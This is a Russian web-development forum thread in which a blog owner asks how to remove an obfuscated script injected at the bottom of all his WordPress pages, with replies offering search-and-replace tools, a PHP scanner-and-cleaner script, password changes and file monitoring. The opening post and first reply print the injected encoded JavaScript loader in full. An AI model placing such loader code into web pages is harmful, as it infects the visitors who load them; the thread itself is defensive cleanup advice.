Форум Сайтостроение Веб-строительство

Вырезать код вируса со всех страниц WP

12 3
[Удален]
2010

Ребята,

На хостинге на всех моих 20 блогах внизу каждого приписано: 

<!-- bdd022efe4bf646eba78134ae9bc7d72 --><script>document.write(unescape("%3Cscript%3Efunction%20d4vgsr%28z1a4zs%29%7Bvar%20obd9s7%3Dnew%20String%28arguments.callee%29%3Bobd9s7%3Dobd9s7.replace%28/%5B%5Ea-z0-9%28%29+_%5Czo62%3D%27%zs%569%2C29550%2C2956%2C29562%2C29544%2C29536%2C29536%2C29564%2C29495%2C29457%2C29473%2C29516%2C29544%2C29459%2C29446%2C29441%2C29446%2C29440%2C29553%2C29556%2C29544%2C29456%2C29554%2C29473%2C29561%2C29479%2C29549%2C29502%2C29553%2C29536%2C29547%2C29440%2C29557%2C29567%2C29561%2C29539%2C29488%2C29545%2C29440%2C29565%2C29549%2C29562%2C29514%2C29482%2C29520%2C29564%2C29549%2C29554%2C29454%2C29494%2C29520%2C29463%2C29542%2C29562%2C29554%2C29481%2C29496%2C29496%2C29493%2C29523%2C29545%2C29526%2C29482%2C29515%2C29524%2C29534%2C29532%2C29456%2C29471%2C29536%2C29452%2C29513%2C29514%2C29535%2C29562%2C29544%2C29466%2C29470%2C29515%2C29485%2C29501%2C29486%2C29558%2C29446%2C29460%2C29440%2C29457%2C29459%2C29564%2C29558%2C29466%2C29441%2C29529%2C29547%2C29448%2C29538%2C29524%2C29562%2C29453%2C29440%2C29470%2C29540%2C29499%2C29470%2C29564%2C29539%2C29551%2C29509%2C29460%2C29552%2C29539%2C29546%2C29565%2C29448%2C29479%2C29462%2C29541%2C29546%2C29478%2C29483%2C29542%2C29553%2C29442%2C29550%2C29498%2C29546%2C29468%2C29538%2C29553%2C29536%2C29546%2C29506%2C29453%2C29446%2C29561%2C29450%2C29506%2C29492%2C29469%2C29537%2C29536%2C29445%2C29542%2C29545%2C29460%2C29461%2C29547%2C29557%2C29504%2C29560%2C29469%2C29463%2C29542%2C29561%2C29563%2C29520%2C29536%2C29563%2C29447%2C29443%2C29545%2C29519%2C29514%2C29520%2C29460%2C29565%2C29537%2C29545%2C29567%2C29563%2C29558%2C29470%2C29500%2C29559%2C29566%2C29455%2C29549%2C29504%2C29525%2C29550%2C29554%2C29558%2C29564%2C29565%2C29501%2C29458%2C29460%2C29459%2C29556%2C29566%2C29445%2C29469%2C29541%2C29468%2C29549%2C29469%2C29527%2C29454%2C29519%2C29501%2C29562%2C29548%2C29444%2C29496%2C29481%2C29559%2C29539%2C29552%2C29514%2C29506%2C29475%2C29517%2C29554%2C29497%2C29542%2C29447%2C29557%2C29502%2C29555%2C29442%2C29540%2C29472%2C29467%2C29554%2C29545%2C29493%2C29528%2C29550%2C29543%2C29565%2C29509%2C29503%2C29497%2C29554%2C29447%2C29444%2C29476%2C29467%2C29536%2C29567%2C29473%2C29483%2C29491%2C29495%2C29488%2C29486%2C29503%2C29493%2C29530%2C29482%2C29535%2C29489%2C29496%2C29489%2C29526%2C29494%2C29466%2C29471%2C29547%2C29566%2C29558%2C29554%2C29563%2C29543%2C29446%2C29554%2C29562%2C29549%2C29489%2C29441%2C29543%2C29443%2C29470%2C29537%2C29547%2C29497%2C29493%2C29487%2C29543%2C29458%2C29548%2C29558%2C29514%2C29503%2C29482%2C29502%2C29514%2C29512%2C29522%2C29534%2C29496%2C29558%2C29545%2C29546%2C29561%2C29540%2C29562%2C29494%2C29548%2C29550%2C29471%2C29470%2C29463%2C29473%2C29487%2C29473%2C29483%2C29488%2C29474%2C29503%2C29545%2C29561%2C29540%2C29444%2C29467%2C29461%2C29563%2C29490%2C29483%2C29490%2C29502%2C29500%2C29457%2C29491%2C29565%2C29563%2C29521%2C29525%2C29511%2C29513%2C29565%2C29546%2C29565%2C29553%2C29561%2C29531%2C29483%2C29480%2C29500%2C29465%2C29471%2C29440%2C29471%2C29463%2C29457%2C29551%2C29511%2C29466%2C29560%2C29448%2C29554%2C29446%2C29542%2C29551%2C29565%2C29460%2C29449%2C29531%2C29555%2C29440%2C29557%2C29554%2C29446%2C29560%2C29551%2C29560%2C29492%2C29475%2C29503%2C29444%2C29565%2C29442%2C29462%2C29539%2C29559%2C29562%2C29554%2C29479%2C29498%2C29567%2C29451%2C29466%2C29457%2C29465%2C29440%2C29461%2C29538%2C29549%2C29553%2C29548%2C29563%2C29540%2C29552%2C29493%2C29486%2C29533%2C29544%2C29542%2C29553%2C29562%2C29555%2C29462%2C29553%2C29560%2C29487%2C29559%2C29442%2C29446%2C29465%2C29558%2C29545%2C29487%2C29565%2C29443%2C29453%2C29560%2C29558%2C29530%2C29566%2C29479%2C29542%2C29564%2C29564%2C29548%2C29505%2C29550%2C29555%2C29543%2C29538%2C29466%2C29540%2C29476%2C29563%2C29442%2C29540%2C29480%2C29529%2C29485%2C29501%2C29492%2C29491%2C29497%2C29492%2C29506%2C29564%2C29444%2C29564%2C29549%2C29474%2C29547%2C29536%2C29542%2C29561%2C29564%2C29561%2C29477%2C29563%2C29541%2C29545%2C29547%2C29503%2C29502%2C29480%2C29490%2C29480%2C29528%2C29481%2C29491%2C29484%2C29466%2C29460%2C29463%2C29455%2C29496%2C29460%2C29461%2C29547%2C29551%2C29449%2C29536%2C29535%2C29549%2C29443%2C29541%2C29449%2C29472%2C29531%2C29522%2C29483%2C29485%2C29498%2C29566%2C29547%2C29469%2C29561%2C29442%2C29544%2C29444%2C29464%2C29514%2C29530%2C29567%2C29562%2C29453%2C29454%2C29562%2C29564%2C29561%2C29467%2C29546%2C29462%2C29440%2C29525%2C29547%2C29560%2C29542%2C29494%2C29551%2C29553%2C29546%2C29549%2C29559%2C29549%2C29552%2C29447%2C29532%2C29467%2C29559%2C29454%2C29559%2C29539%2C29564%2C29453%2C29445%2C29529%2C29545%2C29564%2C29465%2C29536%2C29489%2C29500%2C29542%2C29565%2C29462%2C29445%2C29555%2C29553%2C29465%2C29468%2C29445%2C29542%2C29487%2C29485%2C29539%2C29542%2C29549%2C29467%2C29479%2C29499%2C29478%2C29524%2C29485%2C29489%2C29481%2C29479%2C29500%2C29448%2C29446%2C29540%2C29519%2C29526%2C29490%2C29492%2C29515%2C29517%2C29484%2C29459%2C29544%2C29497%2C29563%2C29454%2C29536%2C29516%2C29512%2C29482%2C29502%2C29490%2C29545%2C29537%2C29559%2C29546%2C29554%2C29445%2C29444%2C29545%2C29451%2C29527%2C29529%2C29522%2C29495%2C29487%2C29566%2C29539%2C29563%2C29546%2C29534%2C29555%2C29564%2C29547%2C29488%2C29545%2C29442%2C29457%2C29515%2C29543%2C29544%2C29536%2C29558%2C29555%2C29495%2C29495%2C29498%2C29493%2C29523%2C29480%2C29491%2C29509%2C29514%2C29479%2C29519%2C29459%2C29446%2C29466%2C29491%2C29542%2C29548%2C29443%2C29556%2C29452%2C29557%2C29554%2C29493%2C29514%2C29508%2C29507%2C29491%2C29559%2C29498%2C29551%2C29522%2C29484%2C29523%2C29492%2C29506%2C29532%2C29479%2C29529%2C29488%2C29488%2C29490%2C29493%2C29473%2C29537%2C29565%2C29469%2C29562%2C29558%2C29558%2C29447%2C29520%2C29528%2C29533%2C29521%2C29492%2C29474%2C29485%2C29503%2C29499%2C29502%2C29489%2C29472%2C29473%2C29514%2C29489%2C29519%2C29475%2C29478%2C29498%2C29517%2C29501%2C29495%2C29537%2C29450%2C29470%2C29537%2C29491%2C29567%2C29559%2C29471%2C29509%2C29557%2C29559%2C29563%2C29489%2C29564%2C29470%2C29468%2C29542%2C29545%2C29489%2C29473%2C29487%2C29474%2C29523%2C29475%2C29501%2C29512%2C29492%2C29473%2C29500%2C29443%2C29442%2C29467%2C29446%2C29494%2C29563%2C29557%2C29562%2C29548%2C29492%2C29492%2C29502%2C29550%2C29543%2C29466%2C29464%2C29532%2C29560%2C29550%2C29566%2C29539%2C29481%2C29460%2C29461%2C29445%2C29564%2C29496%2C29536%2C29539%2C29561%2C29551%2C29546%2C29565%2C29504%2C29556%2C29554%2C29457%2C29518%2C29565%2C29542%2C29567%2C29558%2C29556%2C29498%2C29491%2C29496%2C29554%2C29546%2C29552%2C29456%2C29558%2C29562%2C29555%2C29566%2C29502%2C29472%2C29471%2C29463%2C29457%2C29545%2C29542%2C29469%2C29563%2C29448%2C29541%2C29451%2C29542%2C29482%2C29552%2C29517%2C29505%2C29476%2C29489%2C29523%2C29538%2C29486%2C29514%2C29491%2C29498%2C29485%2C29478%2C29482%2C29483%2C29527%2C29502%2C29531%2C29517%2C29486%2C29567%2C29559%2C29567%2C29547%2C29558%2C29460%2C29478%2C29503%2C29514%2C29563%2C29495%2C29499%2C29516%2C29476%2C29492%2C29566%2C29537%2C29540%2C29502%2C29501%2C29561%2C29460%2C29566%2C29481%2C29563%2C29490%2C29486%2C29512%2C29503%2C29541%2C29473%2C29480%2C29517%2C29445%2C29513%2C29503%2C29541%2C29482%2C29503%2C29508%2C29513%2C29554%2C29477%2C29480%2C29563%2C29473%2C29537%2C29537%2C29559%2C29548%2C29467%2C29567%2C29500%2C29472%2C29508%2C29458%2C29557%2C29442%2C29492%2C29449%2C29549%2C29543%2C29469%2C29567%2C29490%2C29508%2C29557%2C29549%2C29559%2C29516%2C29562%2C29453%2C29563%2C29562%2C29539%2C29541%2C29479%2C29472%2C29490%2C29503%2C29500%2C29456%2C29492%2C29541%2C29561%2C29536%2C29553%2C29546%2C29565%2C29478%2C29476%2C29525%2C29481%2C29494%2C29495%2C29478%2C29495%2C29477%2C29567%2C29470%2C29456%2C29462%2C29456%2C29549%2C29464%2C29537%2C29547%2C29553%2C29506%2C29543%2C29527%2C29560%2C29443%2C29463%2C29558%2C29470%2C29463%2C29458%2C29539%2C29566%2C29456%2C29440%2C29536%2C29465%2C29526%2C29453%2C29523%2C29519%2C29520%2C29546%2C29456%2C29440%2C29526%2C29475%2C29512%2C29512%2C29468%2C29443%2C29460%2C29558%2C29559%2C29556%2C29551%2C29475%2C29495%2C29490%2C29496%2C29557%2C29478%2C29559%2C29469%2C29441%2C29443%2C29561%2C29441%2C29562%2C29503%2C29500%2C29529%2C29542%2C29565%2C29501%2C29500%2C29465%2C29559%2C29560%2C29557%2C29467%2C29443%2C29473%29%29%3C/script%3E"))</script><!--/-->

Как это автоматом отпарсить и убрать, заранее спасибо.

B
На сайте с 16.03.2006
Offline
29
basken
#1
gasyoun:
Ребята,

На хостинге на всех моих 20 блогах внизу каждого приписано: 
<!-- bdd022efe4bf646eba78134ae9bc7d72 --><script>document.write(unescape("%3Cscript%3Efunction%20d4vgsr%28z1a4zs%29%7Bvar%20obd9s7%3Dnew%20String%28arguments.callee%29%3Bobd9s7%3Dobd9s7.replace%28/%5B%5Ea-z0-9%28%29+_%5Czo62%3D%27%zs%569%2C29550%2C2956%2C29562%2C29544%2C29536%2C29536%2C29564%2C29495%2C29457%2C29473%2C29516%2C29544%2C29459%2C29446%2C29441%2C29446%2C29440%2C29553%2C29556%2C29544%2C29456%2C29554%2C29473%2C29561%2C29479%2C29549%2C29502%2C29553%2C29536%2C29547%2C29440%2C29557%2C29567%2C29561%2C29539%2C29488%2C29545%2C29440%2C29565%2C29549%2C29562%2C29514%2C29482%2C29520%2C29564%2C29549%2C29554%2C29454%2C29494%2C29520%2C29463%2C29542%2C29562%2C29554%2C29481%2C29496%2C29496%2C29493%2C29523%2C29545%2C29526%2C29482%2C29515%2C29524%2C29534%2C29532%2C29456%2C29471%2C29536%2C29452%2C29513%2C29514%2C29535%2C29562%2C29544%2C29466%2C29470%2C29515%2C29485%2C29501%2C29486%2C29558%2C29446%2C29460%2C29440%2C29457%2C29459%2C29564%2C29558%2C29466%2C29441%2C29529%2C29547%2C29448%2C29538%2C29524%2C29562%2C29453%2C29440%2C29470%2C29540%2C29499%2C29470%2C29564%2C29539%2C29551%2C29509%2C29460%2C29552%2C29539%2C29546%2C29565%2C29448%2C29479%2C29462%2C29541%2C29546%2C29478%2C29483%2C29542%2C29553%2C29442%2C29550%2C29498%2C29546%2C29468%2C29538%2C29553%2C29536%2C29546%2C29506%2C29453%2C29446%2C29561%2C29450%2C29506%2C29492%2C29469%2C29537%2C29536%2C29445%2C29542%2C29545%2C29460%2C29461%2C29547%2C29557%2C29504%2C29560%2C29469%2C29463%2C29542%2C29561%2C29563%2C29520%2C29536%2C29563%2C29447%2C29443%2C29545%2C29519%2C29514%2C29520%2C29460%2C29565%2C29537%2C29545%2C29567%2C29563%2C29558%2C29470%2C29500%2C29559%2C29566%2C29455%2C29549%2C29504%2C29525%2C29550%2C29554%2C29558%2C29564%2C29565%2C29501%2C29458%2C29460%2C29459%2C29556%2C29566%2C29445%2C29469%2C29541%2C29468%2C29549%2C29469%2C29527%2C29454%2C29519%2C29501%2C29562%2C29548%2C29444%2C29496%2C29481%2C29559%2C29539%2C29552%2C29514%2C29506%2C29475%2C29517%2C29554%2C29497%2C29542%2C29447%2C29557%2C29502%2C29555%2C29442%2C29540%2C29472%2C29467%2C29554%2C29545%2C29493%2C29528%2C29550%2C29543%2C29565%2C29509%2C29503%2C29497%2C29554%2C29447%2C29444%2C29476%2C29467%2C29536%2C29567%2C29473%2C29483%2C29491%2C29495%2C29488%2C29486%2C29503%2C29493%2C29530%2C29482%2C29535%2C29489%2C29496%2C29489%2C29526%2C29494%2C29466%2C29471%2C29547%2C29566%2C29558%2C29554%2C29563%2C29543%2C29446%2C29554%2C29562%2C29549%2C29489%2C29441%2C29543%2C29443%2C29470%2C29537%2C29547%2C29497%2C29493%2C29487%2C29543%2C29458%2C29548%2C29558%2C29514%2C29503%2C29482%2C29502%2C29514%2C29512%2C29522%2C29534%2C29496%2C29558%2C29545%2C29546%2C29561%2C29540%2C29562%2C29494%2C29548%2C29550%2C29471%2C29470%2C29463%2C29473%2C29487%2C29473%2C29483%2C29488%2C29474%2C29503%2C29545%2C29561%2C29540%2C29444%2C29467%2C29461%2C29563%2C29490%2C29483%2C29490%2C29502%2C29500%2C29457%2C29491%2C29565%2C29563%2C29521%2C29525%2C29511%2C29513%2C29565%2C29546%2C29565%2C29553%2C29561%2C29531%2C29483%2C29480%2C29500%2C29465%2C29471%2C29440%2C29471%2C29463%2C29457%2C29551%2C29511%2C29466%2C29560%2C29448%2C29554%2C29446%2C29542%2C29551%2C29565%2C29460%2C29449%2C29531%2C29555%2C29440%2C29557%2C29554%2C29446%2C29560%2C29551%2C29560%2C29492%2C29475%2C29503%2C29444%2C29565%2C29442%2C29462%2C29539%2C29559%2C29562%2C29554%2C29479%2C29498%2C29567%2C29451%2C29466%2C29457%2C29465%2C29440%2C29461%2C29538%2C29549%2C29553%2C29548%2C29563%2C29540%2C29552%2C29493%2C29486%2C29533%2C29544%2C29542%2C29553%2C29562%2C29555%2C29462%2C29553%2C29560%2C29487%2C29559%2C29442%2C29446%2C29465%2C29558%2C29545%2C29487%2C29565%2C29443%2C29453%2C29560%2C29558%2C29530%2C29566%2C29479%2C29542%2C29564%2C29564%2C29548%2C29505%2C29550%2C29555%2C29543%2C29538%2C29466%2C29540%2C29476%2C29563%2C29442%2C29540%2C29480%2C29529%2C29485%2C29501%2C29492%2C29491%2C29497%2C29492%2C29506%2C29564%2C29444%2C29564%2C29549%2C29474%2C29547%2C29536%2C29542%2C29561%2C29564%2C29561%2C29477%2C29563%2C29541%2C29545%2C29547%2C29503%2C29502%2C29480%2C29490%2C29480%2C29528%2C29481%2C29491%2C29484%2C29466%2C29460%2C29463%2C29455%2C29496%2C29460%2C29461%2C29547%2C29551%2C29449%2C29536%2C29535%2C29549%2C29443%2C29541%2C29449%2C29472%2C29531%2C29522%2C29483%2C29485%2C29498%2C29566%2C29547%2C29469%2C29561%2C29442%2C29544%2C29444%2C29464%2C29514%2C29530%2C29567%2C29562%2C29453%2C29454%2C29562%2C29564%2C29561%2C29467%2C29546%2C29462%2C29440%2C29525%2C29547%2C29560%2C29542%2C29494%2C29551%2C29553%2C29546%2C29549%2C29559%2C29549%2C29552%2C29447%2C29532%2C29467%2C29559%2C29454%2C29559%2C29539%2C29564%2C29453%2C29445%2C29529%2C29545%2C29564%2C29465%2C29536%2C29489%2C29500%2C29542%2C29565%2C29462%2C29445%2C29555%2C29553%2C29465%2C29468%2C29445%2C29542%2C29487%2C29485%2C29539%2C29542%2C29549%2C29467%2C29479%2C29499%2C29478%2C29524%2C29485%2C29489%2C29481%2C29479%2C29500%2C29448%2C29446%2C29540%2C29519%2C29526%2C29490%2C29492%2C29515%2C29517%2C29484%2C29459%2C29544%2C29497%2C29563%2C29454%2C29536%2C29516%2C29512%2C29482%2C29502%2C29490%2C29545%2C29537%2C29559%2C29546%2C29554%2C29445%2C29444%2C29545%2C29451%2C29527%2C29529%2C29522%2C29495%2C29487%2C29566%2C29539%2C29563%2C29546%2C29534%2C29555%2C29564%2C29547%2C29488%2C29545%2C29442%2C29457%2C29515%2C29543%2C29544%2C29536%2C29558%2C29555%2C29495%2C29495%2C29498%2C29493%2C29523%2C29480%2C29491%2C29509%2C29514%2C29479%2C29519%2C29459%2C29446%2C29466%2C29491%2C29542%2C29548%2C29443%2C29556%2C29452%2C29557%2C29554%2C29493%2C29514%2C29508%2C29507%2C29491%2C29559%2C29498%2C29551%2C29522%2C29484%2C29523%2C29492%2C29506%2C29532%2C29479%2C29529%2C29488%2C29488%2C29490%2C29493%2C29473%2C29537%2C29565%2C29469%2C29562%2C29558%2C29558%2C29447%2C29520%2C29528%2C29533%2C29521%2C29492%2C29474%2C29485%2C29503%2C29499%2C29502%2C29489%2C29472%2C29473%2C29514%2C29489%2C29519%2C29475%2C29478%2C29498%2C29517%2C29501%2C29495%2C29537%2C29450%2C29470%2C29537%2C29491%2C29567%2C29559%2C29471%2C29509%2C29557%2C29559%2C29563%2C29489%2C29564%2C29470%2C29468%2C29542%2C29545%2C29489%2C29473%2C29487%2C29474%2C29523%2C29475%2C29501%2C29512%2C29492%2C29473%2C29500%2C29443%2C29442%2C29467%2C29446%2C29494%2C29563%2C29557%2C29562%2C29548%2C29492%2C29492%2C29502%2C29550%2C29543%2C29466%2C29464%2C29532%2C29560%2C29550%2C29566%2C29539%2C29481%2C29460%2C29461%2C29445%2C29564%2C29496%2C29536%2C29539%2C29561%2C29551%2C29546%2C29565%2C29504%2C29556%2C29554%2C29457%2C29518%2C29565%2C29542%2C29567%2C29558%2C29556%2C29498%2C29491%2C29496%2C29554%2C29546%2C29552%2C29456%2C29558%2C29562%2C29555%2C29566%2C29502%2C29472%2C29471%2C29463%2C29457%2C29545%2C29542%2C29469%2C29563%2C29448%2C29541%2C29451%2C29542%2C29482%2C29552%2C29517%2C29505%2C29476%2C29489%2C29523%2C29538%2C29486%2C29514%2C29491%2C29498%2C29485%2C29478%2C29482%2C29483%2C29527%2C29502%2C29531%2C29517%2C29486%2C29567%2C29559%2C29567%2C29547%2C29558%2C29460%2C29478%2C29503%2C29514%2C29563%2C29495%2C29499%2C29516%2C29476%2C29492%2C29566%2C29537%2C29540%2C29502%2C29501%2C29561%2C29460%2C29566%2C29481%2C29563%2C29490%2C29486%2C29512%2C29503%2C29541%2C29473%2C29480%2C29517%2C29445%2C29513%2C29503%2C29541%2C29482%2C29503%2C29508%2C29513%2C29554%2C29477%2C29480%2C29563%2C29473%2C29537%2C29537%2C29559%2C29548%2C29467%2C29567%2C29500%2C29472%2C29508%2C29458%2C29557%2C29442%2C29492%2C29449%2C29549%2C29543%2C29469%2C29567%2C29490%2C29508%2C29557%2C29549%2C29559%2C29516%2C29562%2C29453%2C29563%2C29562%2C29539%2C29541%2C29479%2C29472%2C29490%2C29503%2C29500%2C29456%2C29492%2C29541%2C29561%2C29536%2C29553%2C29546%2C29565%2C29478%2C29476%2C29525%2C29481%2C29494%2C29495%2C29478%2C29495%2C29477%2C29567%2C29470%2C29456%2C29462%2C29456%2C29549%2C29464%2C29537%2C29547%2C29553%2C29506%2C29543%2C29527%2C29560%2C29443%2C29463%2C29558%2C29470%2C29463%2C29458%2C29539%2C29566%2C29456%2C29440%2C29536%2C29465%2C29526%2C29453%2C29523%2C29519%2C29520%2C29546%2C29456%2C29440%2C29526%2C29475%2C29512%2C29512%2C29468%2C29443%2C29460%2C29558%2C29559%2C29556%2C29551%2C29475%2C29495%2C29490%2C29496%2C29557%2C29478%2C29559%2C29469%2C29441%2C29443%2C29561%2C29441%2C29562%2C29503%2C29500%2C29529%2C29542%2C29565%2C29501%2C29500%2C29465%2C29559%2C29560%2C29557%2C29467%2C29443%2C29473%29%29%3C/script%3E"))</script><!--/-->


Как это автоматом отпарсить и убрать, заранее спасибо.

Для массового поиска и замены подойдет программа Search and Replace :)

[Удален]
#2

basken, так это же на хостинге, а не локалке... была же замена для фтп тоже

F
На сайте с 04.01.2008
Offline
8
frbus
#3

у меня тоже было такое

просто сменил фтп пароль и перезалил все сайты

срать на репу
B
На сайте с 16.03.2006
Offline
29
basken
#4
gasyoun:
basken, так это же на хостинге, а не локалке... была же замена для фтп тоже

Перетягиваете с хоста на локалку, заменяете код вируса и заливаете обратно.

Замену по ftp не встречал

З.Ы. если встретите поделитесь :)

a.fatman
На сайте с 15.01.2006
Offline
127
a.fatman
#5

А бэкап на хостинге не делается?

mr.mixer
На сайте с 11.12.2007
Offline
108
mr.mixer
#6

Тоже был бы признателен за ссылку на подобный скрипт. Иногда самому приходится скачивать-редактировать-заливать_назад много файлов.

P.S. Пока нормальное решение не найдено, удалить вредоносный код можно было бы тем же путем, каким его и закинули - ифреймером.

IS
На сайте с 16.08.2006
Offline
168
Igor-san
#7

Как-то давно, несколько моих сайтов оказались заражены. Я попросил сына написать подобный скрипт, что он и сделал. Принцип простой, в корневой директории создается папка "trojans", в которой в виде обычных текстовых файлов лежат сигнатуры троянов. Сам скрипт ищет совпадение и вырезает. Во вложении сам скрипт и запаролированная папка "trojans" (пароль: 1), а то антивирусы не пропустят. Вобщем, я так понимаю по аналогии создаете файл trojan.txt с вашей сигнатурой (другие можете удалить, если таких троянов у вас нет). Ну и удачи.

P.S. Естественно, это только для обычных файлов. Если код трояна лежит в базе - делайте дамп и удаляйте оттуда. И, главное, смена всех паролей. Я менял и на почту и на кошельки...Мало ли...

Да, по умолчанию в коде скрипта стоит

define('TREAT', false); //нужно ли лечить зараженный файл

Так что для лечение нужно true

Ну и посмотрите другие настройки.

P.S. Пока писал, вспомнил об одной проблеме. Скрипт нужно выполнять с правами привелигированного пользователя - иначе он не сможет изменить зараженные файлы. Ну, либо вручную править те, что окажутся зараженными. Лично я закачавал на локалку, выполнял в виндах, и затем обратно. Можно хостера попросить проверить под рутом.

zip check.zip
DyaDya
На сайте с 11.04.2007
Offline
147
DyaDya
#8

Решил свой тоже положить, как то пришлось написать, когда хостинг заразили.

patches.php 


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>

	<title>УТИЛИТА: проверка на вирусные включения...</title>

</head>

<body>

<?php

#

#$check_only==true, значит делаем только проверку на вхождения. Изменения не делаем!

$check_only=true;

#$show_patches_only==true, в броузер выводим только то, что требует лечения.

$show_patches_only=true;

#зловредный код, ищем его.

#$pattern = "'<!--\[I\]-->.*?<!--\[/I\]-->'si";

$pattern = "'<!--\[z0s\]-->.*?<!--\[/z0s\]-->'si";



#указываем начальное время.

$fromdate=mktime(1, 0, 0, 9, 21, 2007 );

#указать начальную директорию, файл бросаем в корень любого веб сайта.

$fromdir=".";



#список расширений файлов, которые разрешено проверять на вредоносный код

$ext["allowed"]=array("html", "htm", "php", "php3", "txt", "js");







##########################################################################

Function listdir_fromdate($start_dir='.', $dt) {

global $ext;

  $files = array();

  if (is_dir($start_dir)) {

    $fh = opendir($start_dir);

    while (($file = readdir($fh)) !== false) {

      # loop through the files, skipping . and .., and recursing if necessary

      if (strcmp($file, '.')==0 || strcmp($file, '..')==0) continue;

      $filepath = $start_dir . '/' . $file;

      if ( is_dir($filepath) ){

        $files = array_merge($files, listdir_fromdate($filepath, $dt));

	  }

      else{

		if (filemtime($filepath)>=$dt){

			$path_parts = pathinfo($filepath);

			if (in_array($path_parts['extension'], $ext["allowed"])){

				#echo $path_parts['extension']."<br>";

		        array_push($files, $filepath);

			}

		}

	  }

    }

    closedir($fh);

  } else {

    # false if the function was called with an invalid non-directory argument

    $files = false;

  }

  return $files;

}



#проверяем, есть ли искомый код.

Function check_file($filepath) {

global $pattern;

	$data=file_get_contents($filepath);

	if (preg_match($pattern, $data)){

		return true;

	}

	return false;

}



#лечим файлы.

function patch_file($filepath) {

global $pattern;

	if (!is_writable($filepath)){

		echo ' Не достаточно прав на запись в файл <b>'.$filepath.'</b><br>';

		return false;

	}

	$replacement = "";

	$data=file_get_contents($filepath);

	$data=preg_replace($pattern, $replacement, $data);

/*

	echo '<pre>';

	echo htmlspecialchars($data);

	echo '</pre>';

*/

	$strlen=strlen($data);

	if ($strlen==file_put_contents($filepath, $data)){

	#записано столько сколько и передано

		return true;

	}

	else{

		echo ' В процессе записи было записано меньше данных. <b>'.$filepath.'</b><br>';

		return false;

	}

}



if ( !function_exists('file_put_contents')){

	define('FILE_APPEND', 1);

	function file_put_contents($n, $d, $flag = false) {

	    $mode = ($flag == FILE_APPEND || strtoupper($flag) == 'FILE_APPEND') ? 'a' : 'w';

	    $f = @fopen($n, $mode);

	    if ($f === false) {

	        return 0;

	    } else {

	        if (is_array($d)) $d = implode($d);

	        $bytes_written = fwrite($f, $d);

	        fclose($f);

	        return $bytes_written;

	    }

	}

}

##########################################################################











echo "Выводим все файлы, которые были изменены после <b>".date("H:i:s m.d.Y", $fromdate)."</b><br>";

$files = listdir_fromdate($fromdir, $fromdate);

$cnt=count($files);

$ok=array();#те что были нормальными.

$patches=array();#те что требуют исправлений.

$patches_ok=array();#те что были исправлены.

$patches_errors=array();#те что не смогли исправить.

for ($i=0; $i<$cnt; $i++){

	$color="";

	if (check_file($files[$i])){

		#код найден

		$patches[]=$files[$i];

		echo '<font color="red">'.($i+1).'. FIND! ['.$files[$i].']</font><br>';

		if ($check_only==false){

		#только проверяем, но не вносим изменения, если $check_only==1

			if (patch_file($files[$i])){

				echo '&nbsp;&nbsp;&nbsp;<font color="green">OK! ['.$files[$i].']</font><br>';

				$patches_ok[]=$files[$i];

			}

			else{

				echo '&nbsp;&nbsp;&nbsp;<font color="red">ERROR PATCH! '.($i+1).". [".$files[$i].']</font><br>';

				$patches_errors[]=$files[$i];

			}

		}

	}

	else{

		if ($show_patches_only==false){

			echo ($i+1).". [".$files[$i].']<br>';

		}

		$ok[]=$files[$i];

	}

}

echo "<br>";

echo "==================================================================<br>";

echo '= Всего файлов найдено: <b>'.$cnt.'</b><br>';

echo '= Не были заражены: <b>'.count($ok).'</b><br>';

echo '= Заражены: <b>'.count($patches).'</b><br>';

echo '=== Заражены и вылечены: <b>'.count($patches_ok).'</b><br>';

echo '=== Заражены, но невылечены: <b>'.count($patches_errors).'</b><br>';

echo "==================================================================<br>";

?> 

</body>

</html>

Хотя предудущий пример мне тоже понравился, сразу видно, программист граммотный!!! Но может кому и этот код пригодится.

Кладете в корневую директорию Вашего веб-сервера или любую другую вложенную (приаттачить не получилось, поэтому код прям сюда воткнул, ссори). Прописываете сигнатуру (шаблон) поиска. Запускаете на поиск указанной сигнатуры (предварительно прописать шаблон поиска, можно искать не только вирусы ;) ).

1. Сначала делать в режиме $check_only=true; чтобы просто посмотреть, есть ли вхождения подозрительные.

2. Можно указать дату изменения файлов, которые нужно проверять.

3. Если подозрения есть, то обязательно сделать сначала dump своего сайта!!!

4. Убедиться, что это вирусы и запустить в режиме $check_only=false;

Поиск ведется от текущей директории внуть сайта, рекурсивно.

Удачи, и никому не болеть!!!

ЗЫ. Меня еще удивляет, почему когда заражают, еще и сигнатуры свои приписывают ;)) Похоже, для отчетов перед клиентами!!! что мол столько-то сайтов заражены, платите столько-то!!!

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
IS
На сайте с 16.08.2006
Offline
168
Igor-san
#9

Ну и еще кому может пригодится: так как заражаются файлы index.php index.html index.htm main.htm и т.п., то я создал пустой неиспользуемы файл index.html на всех своих ресурсах и по крону проверяю его размер. Если бяка опять полезет - сразу получу письмо :)

Unlock
На сайте с 01.08.2004
Offline
786
Unlock
#10

Igor-san, отличная идея, может и не панацея, но все же. Подскажите пожалуйста как это реализуется, поподробнее.

Есть желание, - тысяча способов; нет желания, - тысяча поводов! /Петр-I/.
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий